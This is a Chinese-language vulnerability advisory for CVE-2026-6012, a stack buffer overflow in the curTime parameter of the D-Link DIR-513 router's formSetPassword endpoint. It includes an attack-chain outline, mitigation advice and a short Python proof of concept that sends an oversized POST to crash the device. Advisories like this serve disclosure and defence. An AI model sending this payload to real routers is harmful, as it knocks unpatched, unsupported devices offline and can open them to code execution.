CVE-2026-6012 CVSS 8.8 高危

CVE-2026-6012 D-Link DIR-513 缓冲区溢出漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6012

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-513

漏洞概述

D-Link DIR-513路由器固件1.10版本中的/goform/formSetPassword接口存在安全漏洞。由于对POST请求参数处理不当，攻击者可通过操纵curTime参数触发缓冲区溢出。该漏洞允许远程攻击者在无需用户交互的情况下执行代码，影响系统的机密性、完整性和可用性。由于产品已停止支持，目前无官方修复补丁。

技术细节

该漏洞位于D-Link DIR-513的Web服务器组件中，具体涉及处理POST请求的formSetPassword函数。程序在接收/goform/formSetPassword路径的请求时，未对curTime参数进行足够的边界检查。当攻击者发送包含超长字符串的curTime参数时，会触发栈缓冲区溢出。由于服务通常以Root权限运行，成功的利用可覆盖返回地址，导致任意代码执行或设备崩溃（DoS）。攻击向量为网络，攻击复杂度低，需低权限即可触发。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的D-Link DIR-513设备及其Web管理接口。

STEP 2

漏洞利用

攻击者向目标设备的/goform/formSetPassword端点发送特制的POST请求，其中包含超长的curTime参数。

STEP 3

溢出触发

设备处理请求时，由于未检查curTime长度，发生栈缓冲区溢出，覆盖关键内存区域。

STEP 4

执行代码/拒绝服务

攻击者控制程序流程执行恶意代码，或导致设备崩溃重启，造成网络不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    """
    PoC for CVE-2026-6012 Buffer Overflow in D-Link DIR-513
    Target: /goform/formSetPassword
    Vulnerable Param: curTime
    """
    url = f"http://{target_ip}/goform/formSetPassword"
    # Large payload to trigger buffer overflow
    # Exact offset may vary, 1000 bytes is usually sufficient to crash the service
    payload = "A" * 1000
    
    data = {
        "curTime": payload
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"[+] Response code: {response.status_code}")
    except requests.exceptions.ConnectionError:
        print("[!] Connection error - the target may have crashed (DoS).")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_poc(target)

影响范围

D-Link DIR-513 1.10

防御指南

临时缓解措施

建议用户将D-Link DIR-513设备隔离在内网非关键区域，并严格限制访问控制列表（ACL）。若条件允许，应尽快更换为仍在维护周期的网络设备以消除风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6012
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6012
3 Details https://www.cvedetails.com/cve/CVE-2026-6012/
4 VulDB https://vuldb.com/cve/CVE-2026-6012
5 Link https://lavender-bicycle-a5a.notion.site/D-Link-DIR-513-formSetPassword-33153a41781f806e9a3cf63a5a9091ac?source=copy_link
6 Link https://vuldb.com/submit/791858
7 Link https://vuldb.com/vuln/356568
8 Link https://vuldb.com/vuln/356568/cti
9 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表